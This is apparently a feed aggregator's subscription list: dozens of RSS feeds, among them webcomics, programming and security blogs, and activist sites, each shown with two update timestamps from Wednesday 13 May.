https://www.loomio.com/blog/feed/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://www.patreon.com/graveyardgreg/posts/comic.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://x.com/statuses/user_timeline/22724360.rss XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Humble Bundle Blog XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
I, Cringely XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Irregular Webcomic! XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Joel on Software XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Judith Proctor's Journal XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Krebs on Security XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Lambda the Ultimate - Programming Languages Weblog XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Looking For Group XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
LWN.net XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Mimi and Eunice XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Neil Gaiman's Journal XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Nina Paley XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
O Abnormal – Scifi/Fantasy Artist XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Oglaf! -- Comics. Often dirty. XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Oh Joy Sex Toy XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Order of the Stick XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Original Fiction Archives - Reactor XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
OSnews XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Paul Graham: Unofficial RSS Feed XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Penny Arcade XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Penny Red XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
PHD Comics XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Phil's blog XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Planet Debian XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Planet GNU XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Planet Lisp XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Pluralistic: Daily links from Cory Doctorow XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
PS238 by Aaron Williams XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
QC RSS XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Radar XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
RevK®'s ramblings XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Richard Stallman's Political Notes XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Scenes From A Multiverse XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Schneier on Security XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
SCHNEWS.ORG.UK XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Scripting News XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Seth's Blog XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Skin Horse XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Tales From the Riverbank XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
The Adventures of Dr. McNinja XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
The Bumpycat sat on the mat XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
The Daily WTF XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
The Monochrome Mob XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
The Non-Adventures of Wonderella XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
The Old New Thing XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
The Open Source Grid Engine Blog XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
The Stranger XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
towerhamletsalarm XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Twokinds XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
UK Indymedia Features XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Uploads from ne11y XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Uploads from piasladic XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Use Sword on Monster XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
what if? XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Whatever XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Whitechapel Anarchist Group XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
WIL WHEATON dot NET XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
wish XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Writing the Bright Fantastic XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
xkcd.com XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May